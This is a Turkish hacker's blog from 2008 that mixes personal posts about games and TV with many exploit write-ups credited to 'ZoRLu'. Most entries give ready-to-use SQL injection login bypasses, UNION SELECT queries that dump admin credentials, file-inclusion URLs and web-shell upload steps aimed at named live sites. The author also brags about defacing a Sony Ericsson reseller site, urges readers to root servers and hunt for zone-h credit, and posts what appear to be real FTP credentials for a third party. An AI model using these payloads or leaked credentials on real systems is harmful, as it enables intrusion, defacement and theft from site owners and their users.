çok eski bir oyun olmasına rağmen ( ta lise yıllarında ilk tanışmıştım ) şimdilerde kendimi alamıyorum bu oyunu oynamaktan a.q :D 3-5 kanka bir araya gelince mekan belli :P counter hiç sarmıyo ama bu oyun süper :D aslında benim pek oyunla falan işim olmaz ama bu namussuz oyun başka :P tavsiye etmiyorum çünkü bağımlı hale gelebiliyo insan
Blogspotunuza 10 adımda milw0rm.com gadgeti ekleyin
milw0rm.com da yayınlanan son bugların sitenizde de gözükmesi açısından süper bir icat :P şimdi sırasıyla işlemleri takip edin:
1- blogspot.com dan giriş yapıyorsunuz.
2- açılan sayfada yerleşime tıklıyorsunuz ve yeni bir sayfa daha açıldı.
3- burda gadget ekleye tıklıyorsunuz
4- içerik takibi yazan bir gadget var ona tıklayın
5- açılan sayfada şunla karşılaşacaksınız:
"İçerik Takibi URL’si"
6- buraya http://www.milw0rm.com/rss.php bu linki yazın ve devam butonuna basın
7- sonraki aşamada kaç öğe gösterilsin tarih gösterilsin mi vs bunları seçin
8- kaydet butonuna tıklayın.
9- daha sonra oluşan gadgetiniz nerde görünsün istiyorsanız oraya taşıyın ve kaydet butonuna basın
10- bu maddeyide fazladan yazıyorum 10 adıma tamamlamak için :P
1- blogspot.com dan giriş yapıyorsunuz.
2- açılan sayfada yerleşime tıklıyorsunuz ve yeni bir sayfa daha açıldı.
3- burda gadget ekleye tıklıyorsunuz
4- içerik takibi yazan bir gadget var ona tıklayın
5- açılan sayfada şunla karşılaşacaksınız:
"İçerik Takibi URL’si"
6- buraya http://www.milw0rm.com/rss.php bu linki yazın ve devam butonuna basın
7- sonraki aşamada kaç öğe gösterilsin tarih gösterilsin mi vs bunları seçin
8- kaydet butonuna tıklayın.
9- daha sonra oluşan gadgetiniz nerde görünsün istiyorsanız oraya taşıyın ve kaydet butonuna basın
10- bu maddeyide fazladan yazıyorum 10 adıma tamamlamak için :P
AutoCADHocasi.com 8 GB U3 Bellek Hediye Ediyor !
hediye gayet cazip : ) yapmamız gereken şeyde basit ya sitede yorum yazacan yada kendi sitende bu haberi yayınlıycan : ) ee madem bir sitemiz var bizde yayınlıyalım o zaman : ) işte detaylara ulaşabileceğiniz site: TIKLA
12 Aralık 2008 Cuma
hannibal savaş filmi
11 Aralık 2008 Perşembe
easyphp 1.8 localhost
linux kullanmayanlar için bir nevi phpserver. php kaynak kodlu dosyalarınızı çalıştırabilirsiniz
iNDiR
iNDiR
9 Aralık 2008 Salı
PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities
PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7392
Discovered By: ZoRLu
file:
_conf/core/common-tpl-vars.php
c0de:
require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )
rfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
lfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7390
Discovered By: ZoRLu
exp for demo:
http://www.dotnetindex.com/demos/prodownloadmanager/admin/
user: ZoRLu
passwd: ' or '
8 Aralık 2008 Pazartesi
ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities
ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7373
Discovered By: ZoRLu
exp: ( rfu )
http://localhost/script/banners/shell.asp
exp: ( dd )
http://localhost/script/data/DataBase.mdb
rfu: ( for demo )
you go here:
http://demo.merlix.com/adbanner5/Upload.Asp
select your shell.asp
after click to upload button
go your shell.asp
http://demo.merlix.com/adbanner5/banners/xyz.asp
dd: ( for demo )
http://demo.merlix.com/adbanner5/data/DataBase.mdb
7 Aralık 2008 Pazar
Kurban Bayramı
ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability
ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability
link: http://www.milw0rm.com/exploits/7361
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/portal/xportal.mdb
ASP AutoDealer Remote Database Disclosure Vulnerability
ASP AutoDealer Remote Database Disclosure Vulnerability
link: http://www.milw0rm.com/exploits/7360
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/autodealer/auto.mdb
ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability
ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability
link: http://www.milw0rm.com/exploits/7359
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/ticker/news.mdb
yeni şablonumla ilk yazımı yazayım :)
epeydir düşünüyodum temayı değiştirmeyi güzel bi tema buldum direk değiştim :) benim çok hoşuma gitti umarım sizlerde beğenirsiniz : )
6 Aralık 2008 Cumartesi
Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns
Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns
link: http://www.milw0rm.com/exploits/7352
exp for demo: ( DD )
http://demo.merlix.com/teamworx/teamworx.mdb
exp for demo: ( Bypass )
http://demo.merlix.com/teamworx/default.asp
user: ZoRLu ( or dont write anything )
passwd: ' or '
link: http://www.milw0rm.com/exploits/7352
exp for demo: ( DD )
http://demo.merlix.com/teamworx/teamworx.mdb
exp for demo: ( Bypass )
http://demo.merlix.com/teamworx/default.asp
user: ZoRLu ( or dont write anything )
passwd: ' or '
5 Aralık 2008 Cuma
Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities
Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7348
Discovered By: ZoRLu
exp for demo: ( Bypass )
http://demo.merlix.com/school/admin/config.asp
http://demo.merlix.com/school/admin/users.asp
exp for demo: ( DD )
http://demo.merlix.com/school/db/db.mdb
Beyaz'a büyük şok! Öyle bir ses çıktı ki...
msn yaşamda okuduğum bir haber ya bu beyaz bomba adam esprilere dikkat edin bomba :)
Muro'nun başrol oyuncularının konuk olduğu "Nası Yani"de Beyaz neden bir anda donup kaldı?.. İşte nedeni...
CNN Türk'te Meral Okay ve Beyazıt Öztürk'ün sunduğu "Nası Yani"ye "Muro: Nalet Olsun İçimdeki İnsan Sevgisine" filminin başrol oyuncuları konuk oldu.
Stüdyoda filmi değerlendiren konuklar ve Beyaz bir anda izleyicilerden gelen bir sesle adeta şok oldular
Canlı yayında donup kalan Beyaz, gözlerini stüdyodaki izleyicilere çevrirerek, "Ne oldu orada? Bişey oldu" derken, izleyiciler gülme krizine girdi.
Şaşkın bakışlar içinde ne olduğunu anlayan Beyaz, hiç bozuntuya vermeden "İzleyiciler çok rahat. Ne olduğunu çıkan sesten anladık. Tabi soda içersen öyle bir ses çıkar" diyerek, olayı aydınlattı.
Stüdyodaki konuklardan biri boş bulunmuş ve yayına kadar yansıyan şiddette "genirmiş"ti.
Tam Beyaz, konuklarına dönmüştü ki yine bir genirme sesi yükseldi yayında. Bunun üzerine şaşkınlığı bir kat daha artan Beyaz, "Bari koro halinde yapın" diyerek espiriyi patlattı.
kaynak: http://msnyasam.milliyet.com.tr/
Template Creature (SQL/DD) Multiple Remote Vulnerabilities
Template Creature (SQL/DD) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7339
link: http://www.milw0rm.com/exploits/7339
Discovered By: ZoRLu
exp for demo: ( DD )
http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb
exp for demo: ( sql inj )
user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser
pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser
4 Aralık 2008 Perşembe
Hatice Şendil
Kurtlar Vadisi Pusu 49. Bölüm Fragman
muro gidiyor : ) memati ile abdulheyde aralarında ekşın yaşıyolar : ) iyi bir bölüme benziyor
TIKLA iZLE
TIKLA iZLE
1 Aralık 2008 Pazartesi
Sony Ericsson Hacked : )
gecenlerde bulduğum bir açıkla server a daldım server daki sitelerden biride Sony Ericsson sitesiydi :) açık str0ke tarafından yayınlanmadığı için bende yayınlamıycam :( kızdım a.q 16 açık gönderdim aynı anda yayınlamadı :D neymiş sebep artık o scriptlere ait acık yayınlamıycakmış çokta fifi :)
Sony Ericsson: http://sonycenter.co.in/
zone-h: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8209313/
turk-h: http://turk-h.org/defacement/view/310853/sonycenter.co.in/
Sony Ericsson: http://sonycenter.co.in/
zone-h: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8209313/
turk-h: http://turk-h.org/defacement/view/310853/sonycenter.co.in/
yildirimordulari.org
hay a.q
str0ke a 16 açık gönderdim yayınlamıyormuş artık o script acıklarını yayınlasa süper olacaktı : ) neyse can saolsun diyelim : )
28 Kasım 2008 Cuma
Star Articles 6.0 Remote File Upload Vulnerability
Star Articles 6.0 Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7251
Discovered By: ZoRLu
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakIn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/ ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcı olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: trt-turk@hotmail.com
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
link: http://www.milw0rm.com/exploits/7251
Discovered By: ZoRLu
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakIn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/ ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcı olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: trt-turk@hotmail.com
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
27 Kasım 2008 Perşembe
25 Kasım 2008 Salı
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
link: http://www.milw0rm.com/exploits/7229
link: http://www.milw0rm.com/exploits/7229
Discovered By: ZoRLu
file:
include/header.php
exp:
http://localhost/script/include/header.php?config_path=ZoRLu.txt?
Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities
Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7228
link: http://www.milw0rm.com/exploits/7228
Discovered By: ZoRLu
exp for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
XSS for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=[XSS]
Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities
Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7227
link: http://www.milw0rm.com/exploits/7227
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu ( or dont write anything )
note: generally admin name: admin
exploit for demo:
http://www.chipmunk-scripts.com/topsites/login.php
username: admin ' or ' 1=1--
passwd: ZoRLu ( or dont write anything )
or
username: zorlu ' or ' 1=1--
passwd: ZoRLu ( or dont write anything )
XSS:
http://www.arcade-classics.net/top100/index.php?start=[XSS]
Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability
Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability
link: http://www.milw0rm.com/exploits/7225
link: http://www.milw0rm.com/exploits/7225
Discovered By: ZoRLu
file: rss-0.1/lib/action/rss.php
c0de:
include_once("$lib/class/page.php");
include_once("$lib/share/link.php");
include_once("$lib/share/stdio.php");
include_once("$lib/share/string.php");
exp:
http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
24 Kasım 2008 Pazartesi
Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7215
Discovered By: ZoRLu
exploit:
http://localhost/script/lyrics.php?section=full&id=[SQL]
http://localhost/script/info.php?section=[XSS]
[SQL]
99999999+union+select+1,name,3,pass,5+from+admin--
example:
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
login:
http://www.caro-kunde.de/login.php
XSS:
http://www.caro-kunde.de/info.php?section=[XSS]
link: http://www.milw0rm.com/exploits/7215
Discovered By: ZoRLu
exploit:
http://localhost/script/lyrics.php?section=full&id=[SQL]
http://localhost/script/info.php?section=[XSS]
[SQL]
99999999+union+select+1,name,3,pass,5+from+admin--
example:
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
login:
http://www.caro-kunde.de/login.php
XSS:
http://www.caro-kunde.de/info.php?section=[XSS]
23 Kasım 2008 Pazar
PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7202
Discovered By: ZoRLu
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
link: http://www.milw0rm.com/exploits/7202
Discovered By: ZoRLu
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7201
Discovered By: ZoRLu
dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/roommate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7201
Discovered By: ZoRLu
dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/roommate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
PG Real Estate (Auth Bypass) SQL Injection Vulnerability
PG Real Estate (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7200
Discovered By: ZoRLu
dork: "Powered by PG Real Estate Solution - real estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/realestate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7200
Discovered By: ZoRLu
dork: "Powered by PG Real Estate Solution - real estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/realestate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
lütfen demoları hacklemeyin - pls you dont make hack demos
ya arkadaşlar küçük bir ricam olacak demoları hacklemeyin ki yeni acıkları bulabilelim lütfen. şimdi demo hacklenince ben veya diğer arkadaşlarımız nerden scripti bulup test edecek ? diyceksiniz dork yok onuda sizler bulun. geçenlerde bir arkadaşla konuşuyorduk dorkları kendileri bulabiliyolarmış yani sizlerde bulabilirsiniz. demo hacklemek süper bir iş deil misal:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
bu sitenin serverın da yüzlerce site vardı madem hackliycektiniz onları hackleseydiniz demoya dokunmasaydınız. lütfen arkadaşlar bu konuda biraz hassas olalım.
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
bu sitenin serverın da yüzlerce site vardı madem hackliycektiniz onları hackleseydiniz demoya dokunmasaydınız. lütfen arkadaşlar bu konuda biraz hassas olalım.
getaphpsite Auto Dealers Remote File Upload Vulnerability
getaphpsite Auto Dealers Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7189
Discovered By: ZoRLu msn: trt-turk@hotmail.com
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/cardealers/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
link: http://www.milw0rm.com/exploits/7189
Discovered By: ZoRLu msn: trt-turk@hotmail.com
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/cardealers/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
getaphpsite Real Estate Remote File Upload Vulnerability
getaphpsite Real Estate Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7188
Discovered By: ZoRLu
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/realty/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
link: http://www.milw0rm.com/exploits/7188
Discovered By: ZoRLu
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/realty/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
21 Kasım 2008 Cuma
zehir4.asp download
Etiketler:
asp shell,
bütün sheller,
download,
php asp,
php shell,
shell,
zehir4,
zehir4 download,
zehir4.asp
20 Kasım 2008 Perşembe
18 Kasım 2008 Salı
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
Etiketler:
blind sql injection,
Jadu Galaxies,
php asp,
php script,
sql injection
15 Kasım 2008 Cumartesi
mola : (
artık nete vs bir süreliğine ara veriyorum bug 45 te kaldı. inş nasip olurda dönersem kaldığım yerden devam edecem ama öncelikli olarak bu kpss işini halletmem lazım. ara ara nete girerim yine : ) hadi kolay gele by by
turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability
turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7124
Discovered By: ZoRLu
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]
link: http://www.milw0rm.com/exploits/7124
Discovered By: ZoRLu
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]
X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability
X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7123
Discovered By: ZoRLu
Exploit:
username: ZoRLu or anything write
password: ' or ' 1=1--
login for demo:
http://x7chat2demo.hostx7.com/
username: ZoRLu
password: ' or ' 1=1--
link: http://www.milw0rm.com/exploits/7123
Discovered By: ZoRLu
Exploit:
username: ZoRLu or anything write
password: ' or ' 1=1--
login for demo:
http://x7chat2demo.hostx7.com/
username: ZoRLu
password: ' or ' 1=1--
14 Kasım 2008 Cuma
GS Real Estate Portal US/International Module Multiple Vulnerabilities
GS Real Estate Portal US/International Module Multiple Vulnerabilities
link: http://www.milw0rm.com/exploits/7117
Discovered By: ZoRLu
Exploit 1: sql inj
http://localhost/script/email.php?AgentID=[SQL]
[SQL]
-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
sql for demo:
http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
Exploit 2: auth bypass
login: http://localhost/script/login.php
username: [real_admin_or_user_name] ' or ' 1=1--
password: ZoRLu
note: generally admin name: admin
bypass for demo:
login: http://hostnomi.net/int/login.php
admin: admin ' or ' 1=1--
passwd: ZoRLu
exploit 3: Rfu
you login to site and edit your profile upload your_shell.php
after right click to your logo and select properties. copy photo link.
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
edit profile: http://hostnomi.net/int/profile.php
shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
exploit 4: XSS
http://localhost/script/email.php?AgentID=&ListingID=[XSS]
xss for demo:
http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]
link: http://www.milw0rm.com/exploits/7117
Discovered By: ZoRLu
Exploit 1: sql inj
http://localhost/script/email.php?AgentID=[SQL]
[SQL]
-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
sql for demo:
http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
Exploit 2: auth bypass
login: http://localhost/script/login.php
username: [real_admin_or_user_name] ' or ' 1=1--
password: ZoRLu
note: generally admin name: admin
bypass for demo:
login: http://hostnomi.net/int/login.php
admin: admin ' or ' 1=1--
passwd: ZoRLu
exploit 3: Rfu
you login to site and edit your profile upload your_shell.php
after right click to your logo and select properties. copy photo link.
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
edit profile: http://hostnomi.net/int/profile.php
shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
exploit 4: XSS
http://localhost/script/email.php?AgentID=&ListingID=[XSS]
xss for demo:
http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]
netcat download
shell attığınızda root olabilmek için önce nolması lazım bir adet netcat : ) işte size netcat işinize yarar diye düşündüm
edit:
link yenilendi
//ZoRLu
TIKLA iNDiR
netcat.exe yi c:\windows\system32 buraya sallayın
edit:
link yenilendi
//ZoRLu
TIKLA iNDiR
netcat.exe yi c:\windows\system32 buraya sallayın
Etiketler:
nectat.exe,
netcat download,
netcat indir,
netcat.exe indir,
Program,
program indir
BosClassifieds hack video
yönetmen: ZoRLu : )
BosClassifieds md5 kırdıktan sonra napabiliriz küçük bir tavsiye mahiyetinde bir video md5 kırıp admin panele girdikten sonra shellimizi upload ediyoruz ama nasıl
TIKLA iZLE
( rar pass: z0rlu.blogspot.com )
BosClassifieds md5 kırdıktan sonra napabiliriz küçük bir tavsiye mahiyetinde bir video md5 kırıp admin panele girdikten sonra shellimizi upload ediyoruz ama nasıl
TIKLA iZLE
( rar pass: z0rlu.blogspot.com )
bu fakelerin modası geçmedi mi henüz : )
gecenler de bir mail aldım yok efendim hotmail ekibindenmiş güncelleme yapmalıymışım da oymuşda buymuşda : ) yahu arkadaş daha klass daha süper yöntemler çıktı hack için bari onları kullansana : ) hem mailimi hackleyip napacan ben trt-turk@hotmail.com u sadece msn olarak kullanıyorum yani kişi listesinden başka hiç bi halta dokunamazsın ki : ) hem gel insan gibi iste şifreyi vereyim msn listesi doldu zaten silmekten bi hal oldum :) he benim msn mi kimse hackleyemez de demiyorum buda bilinsin geçenlerde hacklenmişti bile bi tanesi : ) neyse uzun lafın kısası yemeyin böle emailleri yok live ekibi yok sifreni ver vs boş bunlar
ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
link: http://www.milw0rm.com/exploits/7110
Discovered By: ZoRLu
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
link: http://www.milw0rm.com/exploits/7110
Discovered By: ZoRLu
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln
ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln
link: http://www.milw0rm.com/exploits/7111
Discovered By: ZoRLu
Exploit:
http://localhost/script/cars_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/cars_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
link: http://www.milw0rm.com/exploits/7111
Discovered By: ZoRLu
Exploit:
http://localhost/script/cars_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/cars_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
